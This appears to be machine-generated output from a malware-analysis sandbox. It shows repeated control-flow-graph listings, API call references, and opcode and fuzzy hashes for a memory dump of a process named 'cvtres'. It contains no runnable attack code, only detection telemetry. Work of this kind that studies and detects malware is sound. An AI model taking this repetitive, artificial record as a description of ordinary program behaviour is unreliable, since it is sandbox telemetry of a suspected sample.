                                                                          control_flow_graph 4269 9ecc4c2-9ecc500 4274 9ecc507-9ecc526 4269->4274 4276 9ecc52c-9ecc53e 4274->4276 4277 9ecc545-9ecc56d 4276->4277 4279 9ecc573-9ecc5c3 4277->4279 4283 9ecc5ca-9ecc5e9 4279->4283 4285 9ecc5ef-9ecc601 4283->4285 4286 9ecc608-9ecc627 4285->4286 4288 9ecc62d-9ecc63f 4286->4288 4289 9ecc646-9ecc66e 4288->4289 4291 9ecc674-9ecc686 4289->4291 4292 9ecc68d-9ecc6b5 4291->4292 4294 9ecc6bb-9ecc6cd 4292->4294 4295 9ecc6d4-9ecc6fc 4294->4295 4297 9ecc702-9ecc714 4295->4297 4298 9ecc71b-9ecc743 4297->4298 4300 9ecc749-9ecc75b 4298->4300 4301 9ecc762-9ecc78a 4300->4301 4303 9ecc790-9ecc7a2 4301->4303 4304 9ecc7a9-9ecc7d1 4303->4304 4306 9ecc7d7-9ecc7e9 4304->4306 4307 9ecc7f0-9ecc818 4306->4307 4309 9ecc81e-9ecc830 4307->4309 4310 9ecc837-9ecc85f 4309->4310 4312 9ecc865-9ecc877 4310->4312 4313 9ecc87e-9ecc8a6 4312->4313 4315 9ecc8ac-9ecc8be 4313->4315 4316 9ecc8c5-9ecc8ed 4315->4316 4318 9ecc8f3-9ecc905 4316->4318 4319 9ecc90c-9ecc934 4318->4319 4321 9ecc93a-9ecc94c 4319->4321 4322 9ecc953-9ecc97e 4321->4322 4324 9ecc984-9ecc996 4322->4324 4325 9ecc99d-9ecca06 DisplayExitWindowsWarnings 4324->4325 4329 9ecca0c-9ecca76 4325->4329 4335 9ecca81-9ecca93 KiUserExceptionDispatcher 4329->4335 4336 9ecca9b-9eccaaa 4335->4336 4338 9eccab5 4336->4338 4339 9eccabd-9eccad8 4338->4339 4342 9eccae3 4339->4342 4343 9eccaeb-9eccb06 4342->4343 4346 9eccb11 4343->4346 4347 9eccb19-9eccb34 4346->4347 4350 9eccb3f 4347->4350 4351 9eccb47-9eccb62 4350->4351 4354 9eccb6d-9eccbe1 LdrInitializeThunk 4351->4354 4356 9eccf05 4354->4356 4357 9eccbe7-9eccc0b 4354->4357 4358 9eccf0b-9eccf1d 4356->4358 4362 9eccd64-9eccd88 4357->4362 4363 9eccc11 4357->4363 4360 9eccf24-9eccf4f 4358->4360 4367 9eccf55-9eccf67 4360->4367 4371 9eccd8e-9eccd90 4362->4371 4372 9eccd8a 4362->4372 4363->4362 4365 9eccc17-9eccd58 4363->4365 4453 9eccd5f 4365->4453 4370 9eccf6e-9eccf99 4367->4370 4378 9eccf9f-9eccfb1 4370->4378 4377 9eccd97-9eccdc1 4371->4377 4375 9eccd8c 4372->4375 4376 9eccd92 4372->4376 4375->4371 4376->4377 4386 9eccdc7-9eccdc9 4377->4386 4387 9eccdc3 4377->4387 4381 9eccfb8-9eccfe3 4378->4381 4389 9eccfe9-9eccffb 4381->4389 4388 9eccdd0-9eccdd6 4386->4388 4390 9eccdcb 4387->4390 4391 9eccdc5 4387->4391 4388->4356 4392 9eccddc-9eccecf 4388->4392 4394 9ecd002-9ecd02d 4389->4394 4390->4388 4391->4386 4450 9ecceda 4392->4450 4400 9ecd033-9ecd045 4394->4400 4403 9ecd04c-9ecd089 KiUserExceptionDispatcher 4400->4403 4407 9ecd093-9ecd0a5 4403->4407 4410 9ecd0ac-9ecd0d7 4407->4410 4415 9ecd0dd-9ecd0ef 4410->4415 4418 9ecd0f6-9ecd121 4415->4418 4423 9ecd127-9ecd139 4418->4423 4426 9ecd140-9ecd16b 4423->4426 4432 9ecd171-9ecd183 4426->4432 4433 9ecd18a-9ecd1b5 4432->4433 4439 9ecd1bb-9ecd1cd 4433->4439 4442 9ecd1d4-9ecd1ff 4439->4442 4447 9ecd205-9ecd217 4442->4447 4451 9ecd21e-9ecd249 4447->4451 4450->4356 4454 9ecd24f-9ecd261 4451->4454 4453->4356 4455 9ecd268-9ecd293 4454->4455 4457 9ecd299-9ecd2ab 4455->4457 4458 9ecd2b2-9ecd2dd 4457->4458 4460 9ecd2e3-9ecd2f5 4458->4460 4461 9ecd2fc-9ecd327 4460->4461 4463 9ecd32d-9ecd37b 4461->4463 4466 9ecd671-9ecd682 4463->4466 4467 9ecd381-9ecd3a4 4463->4467 4470 9ecd688-9ecd68f 4466->4470 4471 9ecd9e2-9ecd9e9 4466->4471 4477 9ecd659-9ecd66e 4467->4477 4478 9ecd3aa-9ecd41c 4467->4478 4473 9ecd728-9ecd72f 4470->4473 4474 9ecd695-9ecd6f5 4470->4474 4475 9ecd9ef-9ecda60 4471->4475 4476 9ecda6b-9ecda86 4471->4476 4479 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 4473->4479 4480 9ecd8a1-9ecd8a8 4473->4480 4474->4471 4475->4476 4489 9ecd66f 4477->4489 4508 9ecd641-9ecd653 4478->4508 4509 9ecd422-9ecd429 4478->4509 4479->4471 4480->4471 4484 9ecd8ae 4480->4484 4490 9ecd8b3 4484->4490 4489->4489 4495 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 4490->4495 4561 9ecd9a1 4495->4561 4508->4477 4508->4478 4512 9ecd42f-9ecd53d 4509->4512 4513 9ecd542-9ecd56d 4509->4513 4512->4508 4513->4508 4517 9ecd573-9ecd616 4513->4517 4517->4508 4565 9ecd9a9 4561->4565 4570 9ecd9b0-9ecd9b7 4565->4570 4574 9ecd9c3 4570->4574 4574->4471
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: fa2b1780223f72c4fc72011025c0df13a598240da6dd34245fd4e7ee94c09551
                                                                          • Instruction ID: 57a0c01594ce32398ccedba44dda7a54060b0145035a8bac73af73ae2a47609c
                                                                          • Opcode Fuzzy Hash: fa2b1780223f72c4fc72011025c0df13a598240da6dd34245fd4e7ee94c09551
                                                                          • Instruction Fuzzy Hash: 8A42E5B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 4593 9ecc509-9ecc51b 4595 9ecc521-9ecc526 4593->4595 4597 9ecc52c-9ecc53e 4595->4597 4598 9ecc545-9ecc56d 4597->4598 4600 9ecc573-9ecc5c3 4598->4600 4604 9ecc5ca-9ecc5e9 4600->4604 4606 9ecc5ef-9ecc601 4604->4606 4607 9ecc608-9ecc627 4606->4607 4609 9ecc62d-9ecc63f 4607->4609 4610 9ecc646-9ecc66e 4609->4610 4612 9ecc674-9ecc686 4610->4612 4613 9ecc68d-9ecc6b5 4612->4613 4615 9ecc6bb-9ecc6cd 4613->4615 4616 9ecc6d4-9ecc6fc 4615->4616 4618 9ecc702-9ecc714 4616->4618 4619 9ecc71b-9ecc743 4618->4619 4621 9ecc749-9ecc75b 4619->4621 4622 9ecc762-9ecc78a 4621->4622 4624 9ecc790-9ecc7a2 4622->4624 4625 9ecc7a9-9ecc7d1 4624->4625 4627 9ecc7d7-9ecc7e9 4625->4627 4628 9ecc7f0-9ecc818 4627->4628 4630 9ecc81e-9ecc830 4628->4630 4631 9ecc837-9ecc85f 4630->4631 4633 9ecc865-9ecc877 4631->4633 4634 9ecc87e-9ecc8a6 4633->4634 4636 9ecc8ac-9ecc8be 4634->4636 4637 9ecc8c5-9ecc8ed 4636->4637 4639 9ecc8f3-9ecc905 4637->4639 4640 9ecc90c-9ecc934 4639->4640 4642 9ecc93a-9ecc94c 4640->4642 4643 9ecc953-9ecc97e 4642->4643 4645 9ecc984-9ecc996 4643->4645 4646 9ecc99d-9ecca06 DisplayExitWindowsWarnings 4645->4646 4650 9ecca0c-9ecca76 4646->4650 4656 9ecca81-9ecca93 KiUserExceptionDispatcher 4650->4656 4657 9ecca9b-9eccaaa 4656->4657 4659 9eccab5 4657->4659 4660 9eccabd-9eccad8 4659->4660 4663 9eccae3 4660->4663 4664 9eccaeb-9eccb06 4663->4664 4667 9eccb11 4664->4667 4668 9eccb19-9eccb34 4667->4668 4671 9eccb3f 4668->4671 4672 9eccb47-9eccb62 4671->4672 4675 9eccb6d-9eccbe1 LdrInitializeThunk 4672->4675 4677 9eccf05 4675->4677 4678 9eccbe7-9eccc0b 4675->4678 4679 9eccf0b-9eccf1d 4677->4679 4683 9eccd64-9eccd88 4678->4683 4684 9eccc11 4678->4684 4681 9eccf24-9eccf4f 4679->4681 4688 9eccf55-9eccf67 4681->4688 4692 9eccd8e-9eccd90 4683->4692 4693 9eccd8a 4683->4693 4684->4683 4686 9eccc17-9eccd58 4684->4686 4774 9eccd5f 4686->4774 4691 9eccf6e-9eccf99 4688->4691 4699 9eccf9f-9eccfb1 4691->4699 4698 9eccd97-9eccdc1 4692->4698 4696 9eccd8c 4693->4696 4697 9eccd92 4693->4697 4696->4692 4697->4698 4707 9eccdc7-9eccdc9 4698->4707 4708 9eccdc3 4698->4708 4702 9eccfb8-9eccfe3 4699->4702 4710 9eccfe9-9eccffb 4702->4710 4709 9eccdd0-9eccdd6 4707->4709 4711 9eccdcb 4708->4711 4712 9eccdc5 4708->4712 4709->4677 4713 9eccddc-9eccecf 4709->4713 4715 9ecd002-9ecd02d 4710->4715 4711->4709 4712->4707 4771 9ecceda 4713->4771 4721 9ecd033-9ecd045 4715->4721 4724 9ecd04c-9ecd089 KiUserExceptionDispatcher 4721->4724 4728 9ecd093-9ecd0a5 4724->4728 4731 9ecd0ac-9ecd0d7 4728->4731 4736 9ecd0dd-9ecd0ef 4731->4736 4739 9ecd0f6-9ecd121 4736->4739 4744 9ecd127-9ecd139 4739->4744 4747 9ecd140-9ecd16b 4744->4747 4753 9ecd171-9ecd183 4747->4753 4754 9ecd18a-9ecd1b5 4753->4754 4760 9ecd1bb-9ecd1cd 4754->4760 4763 9ecd1d4-9ecd1ff 4760->4763 4768 9ecd205-9ecd217 4763->4768 4772 9ecd21e-9ecd249 4768->4772 4771->4677 4775 9ecd24f-9ecd261 4772->4775 4774->4677 4776 9ecd268-9ecd293 4775->4776 4778 9ecd299-9ecd2ab 4776->4778 4779 9ecd2b2-9ecd2dd 4778->4779 4781 9ecd2e3-9ecd2f5 4779->4781 4782 9ecd2fc-9ecd327 4781->4782 4784 9ecd32d-9ecd37b 4782->4784 4787 9ecd671-9ecd682 4784->4787 4788 9ecd381-9ecd3a4 4784->4788 4791 9ecd688-9ecd68f 4787->4791 4792 9ecd9e2-9ecd9e9 4787->4792 4798 9ecd659-9ecd66e 4788->4798 4799 9ecd3aa-9ecd41c 4788->4799 4794 9ecd728-9ecd72f 4791->4794 4795 9ecd695-9ecd6f5 4791->4795 4796 9ecd9ef-9ecda60 4792->4796 4797 9ecda6b-9ecda86 4792->4797 4800 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 4794->4800 4801 9ecd8a1-9ecd8a8 4794->4801 4795->4792 4796->4797 4810 9ecd66f 4798->4810 4829 9ecd641-9ecd653 4799->4829 4830 9ecd422-9ecd429 4799->4830 4800->4792 4801->4792 4805 9ecd8ae 4801->4805 4811 9ecd8b3 4805->4811 4810->4810 4816 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 4811->4816 4882 9ecd9a1 4816->4882 4829->4798 4829->4799 4833 9ecd42f-9ecd53d 4830->4833 4834 9ecd542-9ecd56d 4830->4834 4833->4829 4834->4829 4838 9ecd573-9ecd616 4834->4838 4838->4829 4886 9ecd9a9 4882->4886 4891 9ecd9b0-9ecd9b7 4886->4891 4895 9ecd9c3 4891->4895 4895->4792
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: e1bd3df7a42d6afee8aef788ab8a92221d4b3204b5c8e2d6bb5b6ced2dec4143
                                                                          • Instruction ID: 31c877c32ed1a3b6c49f0b51cf960b423fe2b2dc75a7f112273c1e333fe4db8f
                                                                          • Opcode Fuzzy Hash: e1bd3df7a42d6afee8aef788ab8a92221d4b3204b5c8e2d6bb5b6ced2dec4143
                                                                          • Instruction Fuzzy Hash: FA42E5B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 4914 9ecc547-9ecc55f 4916 9ecc568-9ecc56d 4914->4916 4918 9ecc573-9ecc5c3 4916->4918 4922 9ecc5ca-9ecc5e9 4918->4922 4924 9ecc5ef-9ecc601 4922->4924 4925 9ecc608-9ecc627 4924->4925 4927 9ecc62d-9ecc63f 4925->4927 4928 9ecc646-9ecc66e 4927->4928 4930 9ecc674-9ecc686 4928->4930 4931 9ecc68d-9ecc6b5 4930->4931 4933 9ecc6bb-9ecc6cd 4931->4933 4934 9ecc6d4-9ecc6fc 4933->4934 4936 9ecc702-9ecc714 4934->4936 4937 9ecc71b-9ecc743 4936->4937 4939 9ecc749-9ecc75b 4937->4939 4940 9ecc762-9ecc78a 4939->4940 4942 9ecc790-9ecc7a2 4940->4942 4943 9ecc7a9-9ecc7d1 4942->4943 4945 9ecc7d7-9ecc7e9 4943->4945 4946 9ecc7f0-9ecc818 4945->4946 4948 9ecc81e-9ecc830 4946->4948 4949 9ecc837-9ecc85f 4948->4949 4951 9ecc865-9ecc877 4949->4951 4952 9ecc87e-9ecc8a6 4951->4952 4954 9ecc8ac-9ecc8be 4952->4954 4955 9ecc8c5-9ecc8ed 4954->4955 4957 9ecc8f3-9ecc905 4955->4957 4958 9ecc90c-9ecc934 4957->4958 4960 9ecc93a-9ecc94c 4958->4960 4961 9ecc953-9ecc97e 4960->4961 4963 9ecc984-9ecc996 4961->4963 4964 9ecc99d-9ecca06 DisplayExitWindowsWarnings 4963->4964 4968 9ecca0c-9ecca76 4964->4968 4974 9ecca81-9ecca93 KiUserExceptionDispatcher 4968->4974 4975 9ecca9b-9eccaaa 4974->4975 4977 9eccab5 4975->4977 4978 9eccabd-9eccad8 4977->4978 4981 9eccae3 4978->4981 4982 9eccaeb-9eccb06 4981->4982 4985 9eccb11 4982->4985 4986 9eccb19-9eccb34 4985->4986 4989 9eccb3f 4986->4989 4990 9eccb47-9eccb62 4989->4990 4993 9eccb6d-9eccbe1 LdrInitializeThunk 4990->4993 4995 9eccf05 4993->4995 4996 9eccbe7-9eccc0b 4993->4996 4997 9eccf0b-9eccf1d 4995->4997 5001 9eccd64-9eccd88 4996->5001 5002 9eccc11 4996->5002 4999 9eccf24-9eccf4f 4997->4999 5006 9eccf55-9eccf67 4999->5006 5010 9eccd8e-9eccd90 5001->5010 5011 9eccd8a 5001->5011 5002->5001 5004 9eccc17-9eccd58 5002->5004 5092 9eccd5f 5004->5092 5009 9eccf6e-9eccf99 5006->5009 5017 9eccf9f-9eccfb1 5009->5017 5016 9eccd97-9eccdc1 5010->5016 5014 9eccd8c 5011->5014 5015 9eccd92 5011->5015 5014->5010 5015->5016 5025 9eccdc7-9eccdc9 5016->5025 5026 9eccdc3 5016->5026 5020 9eccfb8-9eccfe3 5017->5020 5028 9eccfe9-9eccffb 5020->5028 5027 9eccdd0-9eccdd6 5025->5027 5029 9eccdcb 5026->5029 5030 9eccdc5 5026->5030 5027->4995 5031 9eccddc-9eccecf 5027->5031 5033 9ecd002-9ecd02d 5028->5033 5029->5027 5030->5025 5089 9ecceda 5031->5089 5039 9ecd033-9ecd045 5033->5039 5042 9ecd04c-9ecd089 KiUserExceptionDispatcher 5039->5042 5046 9ecd093-9ecd0a5 5042->5046 5049 9ecd0ac-9ecd0d7 5046->5049 5054 9ecd0dd-9ecd0ef 5049->5054 5057 9ecd0f6-9ecd121 5054->5057 5062 9ecd127-9ecd139 5057->5062 5065 9ecd140-9ecd16b 5062->5065 5071 9ecd171-9ecd183 5065->5071 5072 9ecd18a-9ecd1b5 5071->5072 5078 9ecd1bb-9ecd1cd 5072->5078 5081 9ecd1d4-9ecd1ff 5078->5081 5086 9ecd205-9ecd217 5081->5086 5090 9ecd21e-9ecd249 5086->5090 5089->4995 5093 9ecd24f-9ecd261 5090->5093 5092->4995 5094 9ecd268-9ecd293 5093->5094 5096 9ecd299-9ecd2ab 5094->5096 5097 9ecd2b2-9ecd2dd 5096->5097 5099 9ecd2e3-9ecd2f5 5097->5099 5100 9ecd2fc-9ecd327 5099->5100 5102 9ecd32d-9ecd37b 5100->5102 5105 9ecd671-9ecd682 5102->5105 5106 9ecd381-9ecd3a4 5102->5106 5109 9ecd688-9ecd68f 5105->5109 5110 9ecd9e2-9ecd9e9 5105->5110 5116 9ecd659-9ecd66e 5106->5116 5117 9ecd3aa-9ecd41c 5106->5117 5112 9ecd728-9ecd72f 5109->5112 5113 9ecd695-9ecd6f5 5109->5113 5114 9ecd9ef-9ecda60 5110->5114 5115 9ecda6b-9ecda86 5110->5115 5118 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 5112->5118 5119 9ecd8a1-9ecd8a8 5112->5119 5113->5110 5114->5115 5128 9ecd66f 5116->5128 5147 9ecd641-9ecd653 5117->5147 5148 9ecd422-9ecd429 5117->5148 5118->5110 5119->5110 5123 9ecd8ae 5119->5123 5129 9ecd8b3 5123->5129 5128->5128 5134 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 5129->5134 5200 9ecd9a1 5134->5200 5147->5116 5147->5117 5151 9ecd42f-9ecd53d 5148->5151 5152 9ecd542-9ecd56d 5148->5152 5151->5147 5152->5147 5156 9ecd573-9ecd616 5152->5156 5156->5147 5204 9ecd9a9 5200->5204 5209 9ecd9b0-9ecd9b7 5204->5209 5213 9ecd9c3 5209->5213 5213->5110
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 5d7e4a69d0cd0a4ef372f29aab8de55835b58fadcb7fe403db3eb4997ece791b
                                                                          • Instruction ID: 0dc2c72593196af2ada4d0322f791ce4ffca1af81a96c6201b7747a711e451b4
                                                                          • Opcode Fuzzy Hash: 5d7e4a69d0cd0a4ef372f29aab8de55835b58fadcb7fe403db3eb4997ece791b
                                                                          • Instruction Fuzzy Hash: CE42E5B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 5232 9ecc58e-9ecc5c3 5237 9ecc5ca-9ecc5e9 5232->5237 5239 9ecc5ef-9ecc601 5237->5239 5240 9ecc608-9ecc627 5239->5240 5242 9ecc62d-9ecc63f 5240->5242 5243 9ecc646-9ecc66e 5242->5243 5245 9ecc674-9ecc686 5243->5245 5246 9ecc68d-9ecc6b5 5245->5246 5248 9ecc6bb-9ecc6cd 5246->5248 5249 9ecc6d4-9ecc6fc 5248->5249 5251 9ecc702-9ecc714 5249->5251 5252 9ecc71b-9ecc743 5251->5252 5254 9ecc749-9ecc75b 5252->5254 5255 9ecc762-9ecc78a 5254->5255 5257 9ecc790-9ecc7a2 5255->5257 5258 9ecc7a9-9ecc7d1 5257->5258 5260 9ecc7d7-9ecc7e9 5258->5260 5261 9ecc7f0-9ecc818 5260->5261 5263 9ecc81e-9ecc830 5261->5263 5264 9ecc837-9ecc85f 5263->5264 5266 9ecc865-9ecc877 5264->5266 5267 9ecc87e-9ecc8a6 5266->5267 5269 9ecc8ac-9ecc8be 5267->5269 5270 9ecc8c5-9ecc8ed 5269->5270 5272 9ecc8f3-9ecc905 5270->5272 5273 9ecc90c-9ecc934 5272->5273 5275 9ecc93a-9ecc94c 5273->5275 5276 9ecc953-9ecc97e 5275->5276 5278 9ecc984-9ecc996 5276->5278 5279 9ecc99d-9ecca06 DisplayExitWindowsWarnings 5278->5279 5283 9ecca0c-9ecca76 5279->5283 5289 9ecca81-9ecca93 KiUserExceptionDispatcher 5283->5289 5290 9ecca9b-9eccaaa 5289->5290 5292 9eccab5 5290->5292 5293 9eccabd-9eccad8 5292->5293 5296 9eccae3 5293->5296 5297 9eccaeb-9eccb06 5296->5297 5300 9eccb11 5297->5300 5301 9eccb19-9eccb34 5300->5301 5304 9eccb3f 5301->5304 5305 9eccb47-9eccb62 5304->5305 5308 9eccb6d-9eccbe1 LdrInitializeThunk 5305->5308 5310 9eccf05 5308->5310 5311 9eccbe7-9eccc0b 5308->5311 5312 9eccf0b-9eccf1d 5310->5312 5316 9eccd64-9eccd88 5311->5316 5317 9eccc11 5311->5317 5314 9eccf24-9eccf4f 5312->5314 5321 9eccf55-9eccf67 5314->5321 5325 9eccd8e-9eccd90 5316->5325 5326 9eccd8a 5316->5326 5317->5316 5319 9eccc17-9eccd58 5317->5319 5407 9eccd5f 5319->5407 5324 9eccf6e-9eccf99 5321->5324 5332 9eccf9f-9eccfb1 5324->5332 5331 9eccd97-9eccdc1 5325->5331 5329 9eccd8c 5326->5329 5330 9eccd92 5326->5330 5329->5325 5330->5331 5340 9eccdc7-9eccdc9 5331->5340 5341 9eccdc3 5331->5341 5335 9eccfb8-9eccfe3 5332->5335 5343 9eccfe9-9eccffb 5335->5343 5342 9eccdd0-9eccdd6 5340->5342 5344 9eccdcb 5341->5344 5345 9eccdc5 5341->5345 5342->5310 5346 9eccddc-9eccecf 5342->5346 5348 9ecd002-9ecd02d 5343->5348 5344->5342 5345->5340 5404 9ecceda 5346->5404 5354 9ecd033-9ecd045 5348->5354 5357 9ecd04c-9ecd089 KiUserExceptionDispatcher 5354->5357 5361 9ecd093-9ecd0a5 5357->5361 5364 9ecd0ac-9ecd0d7 5361->5364 5369 9ecd0dd-9ecd0ef 5364->5369 5372 9ecd0f6-9ecd121 5369->5372 5377 9ecd127-9ecd139 5372->5377 5380 9ecd140-9ecd16b 5377->5380 5386 9ecd171-9ecd183 5380->5386 5387 9ecd18a-9ecd1b5 5386->5387 5393 9ecd1bb-9ecd1cd 5387->5393 5396 9ecd1d4-9ecd1ff 5393->5396 5401 9ecd205-9ecd217 5396->5401 5405 9ecd21e-9ecd249 5401->5405 5404->5310 5408 9ecd24f-9ecd261 5405->5408 5407->5310 5409 9ecd268-9ecd293 5408->5409 5411 9ecd299-9ecd2ab 5409->5411 5412 9ecd2b2-9ecd2dd 5411->5412 5414 9ecd2e3-9ecd2f5 5412->5414 5415 9ecd2fc-9ecd327 5414->5415 5417 9ecd32d-9ecd37b 5415->5417 5420 9ecd671-9ecd682 5417->5420 5421 9ecd381-9ecd3a4 5417->5421 5424 9ecd688-9ecd68f 5420->5424 5425 9ecd9e2-9ecd9e9 5420->5425 5431 9ecd659-9ecd66e 5421->5431 5432 9ecd3aa-9ecd41c 5421->5432 5427 9ecd728-9ecd72f 5424->5427 5428 9ecd695-9ecd6f5 5424->5428 5429 9ecd9ef-9ecda60 5425->5429 5430 9ecda6b-9ecda86 5425->5430 5433 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 5427->5433 5434 9ecd8a1-9ecd8a8 5427->5434 5428->5425 5429->5430 5443 9ecd66f 5431->5443 5462 9ecd641-9ecd653 5432->5462 5463 9ecd422-9ecd429 5432->5463 5433->5425 5434->5425 5438 9ecd8ae 5434->5438 5444 9ecd8b3 5438->5444 5443->5443 5449 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 5444->5449 5515 9ecd9a1 5449->5515 5462->5431 5462->5432 5466 9ecd42f-9ecd53d 5463->5466 5467 9ecd542-9ecd56d 5463->5467 5466->5462 5467->5462 5471 9ecd573-9ecd616 5467->5471 5471->5462 5519 9ecd9a9 5515->5519 5524 9ecd9b0-9ecd9b7 5519->5524 5528 9ecd9c3 5524->5528 5528->5425
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 57c0107f228deb5acb9e85ab23a077f7c33dcdc6d93aec8729def9f3be25f517
                                                                          • Instruction ID: 8a536720faffa688c65c9f6ebd06c79e55abc6eaa73b7597e51035c085034e1a
                                                                          • Opcode Fuzzy Hash: 57c0107f228deb5acb9e85ab23a077f7c33dcdc6d93aec8729def9f3be25f517
                                                                          • Instruction Fuzzy Hash: 4042E6B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 5547 9ecc5cc-9eccbe1 DisplayExitWindowsWarnings KiUserExceptionDispatcher LdrInitializeThunk 5622 9eccf05-9ecd37b KiUserExceptionDispatcher 5547->5622 5623 9eccbe7-9eccc0b 5547->5623 5732 9ecd671-9ecd682 5622->5732 5733 9ecd381-9ecd3a4 5622->5733 5628 9eccd64-9eccd88 5623->5628 5629 9eccc11 5623->5629 5637 9eccd8e-9eccd90 5628->5637 5638 9eccd8a 5628->5638 5629->5628 5631 9eccc17-9eccd5f 5629->5631 5631->5622 5643 9eccd97-9eccdc1 5637->5643 5641 9eccd8c 5638->5641 5642 9eccd92 5638->5642 5641->5637 5642->5643 5652 9eccdc7-9eccdc9 5643->5652 5653 9eccdc3 5643->5653 5654 9eccdd0-9eccdd6 5652->5654 5656 9eccdcb 5653->5656 5657 9eccdc5 5653->5657 5654->5622 5658 9eccddc-9ecceda 5654->5658 5656->5654 5657->5652 5658->5622 5736 9ecd688-9ecd68f 5732->5736 5737 9ecd9e2-9ecd9e9 5732->5737 5743 9ecd659-9ecd66e 5733->5743 5744 9ecd3aa-9ecd41c 5733->5744 5739 9ecd728-9ecd72f 5736->5739 5740 9ecd695-9ecd6f5 5736->5740 5741 9ecd9ef-9ecda60 5737->5741 5742 9ecda6b-9ecda86 5737->5742 5745 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 5739->5745 5746 9ecd8a1-9ecd8a8 5739->5746 5740->5737 5741->5742 5755 9ecd66f 5743->5755 5774 9ecd641-9ecd653 5744->5774 5775 9ecd422-9ecd429 5744->5775 5745->5737 5746->5737 5750 9ecd8ae-9ecd9b7 call 9ecb2e0 call 9ecaee8 call 9ecaf30 5746->5750 5840 9ecd9c3 5750->5840 5755->5755 5774->5743 5774->5744 5778 9ecd42f-9ecd53d 5775->5778 5779 9ecd542-9ecd56d 5775->5779 5778->5774 5779->5774 5783 9ecd573-9ecd616 5779->5783 5783->5774 5840->5737
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
